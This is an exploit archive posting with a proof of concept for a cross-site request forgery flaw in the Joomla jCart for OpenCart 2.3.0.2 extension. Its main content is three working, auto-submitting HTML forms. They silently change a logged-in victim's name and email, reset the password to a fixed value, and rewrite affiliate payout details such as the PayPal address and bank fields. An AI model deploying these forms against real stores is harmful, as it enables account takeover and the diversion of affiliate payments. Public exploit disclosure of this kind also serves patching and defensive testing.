Joomla jCart For OpenCart 2.3.0.2 Cross Site Request Forgery

Joomla jCart For OpenCart 2.3.0.2 Cross Site Request Forgery: Posted May 28, 2018; Authored by Borna Nematzadeh; Joomla jCart for OpenCart component version 2.3.0.2 suffers from a cross site request forgery vulnerability.; tags | exploit, csrf; SHA-256 | 114563506afd2b68b276ae85037c5e86677c9c3d1888697553baf7f13e4d2a43; Download | Favorite | View

Joomla jCart For OpenCart 2.3.0.2 Cross Site Request Forgery

# Exploit Title: Joomla! extension jCart for OpenCart 2.3.0.2 - Cross site request forgery
# Date: 2018-05-28
# Exploit Author: L0RD or borna.nematzadeh123@gmail.com
# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/e-commerce-integrations/jcart-for-opencart/
# Vendor Homepage: https://www.joomlaextensions.co.in/
# Version: 2.3.0.2
# Tested on: Kali linux
===================================================
 
# POC :
 
# Change user information exploit :
 
<html>
  <body>
    <form action="http://site.com/jcart/account/edit.html" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="firstname" value="D3C0DE" />
      <input type="hidden" name="lastname" value="revenge" />
      <input type="hidden" name="email" value="decod3.n@gmail.com" />
      <input type="hidden" name="telephone" value="100000" />
    </form>
    <script>
        document.forms[0].submit();
    </script>
  </body>
</html>
 
 
# Change password exploit :
 
<form action="http://site.com/jcart/account/password.html" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="password" value="2468" />
      <input type="hidden" name="confirm" value="2468" />
</form>
<script>
   document.forms[0].submit();
</script>
 
 
# Change affiliate account information exploit :
 
 <form action="http://site.com/jcart/account/affiliate/edit.html" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="company" value="decode" />
      <input type="hidden" name="website" value="test.com" />
      <input type="hidden" name="tax" value="100000000" />
      <input type="hidden" name="payment" value="paypal" />
      <input type="hidden" name="cheque" value="" />
      <input type="hidden" name="paypal" value="test@test.com" />
      <input type="hidden" name="bank_name" value="" />
      <input type="hidden" name="bank_branch_number" value=""
/>
      <input type="hidden" name="bank_swift_code" value="" />
      <input type="hidden" name="bank_account_name" value="" />
      <input type="hidden" name="bank_account_number" value=""
/>
    </form>
    <script>
        document.forms[0].submit();
    </script>
 
====================================================

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Joomla jCart For OpenCart 2.3.0.2 Cross Site Request Forgery

Joomla jCart For OpenCart 2.3.0.2 Cross Site Request Forgery

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Joomla jCart For OpenCart 2.3.0.2 Cross Site Request Forgery

Share This

Joomla jCart For OpenCart 2.3.0.2 Cross Site Request Forgery

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems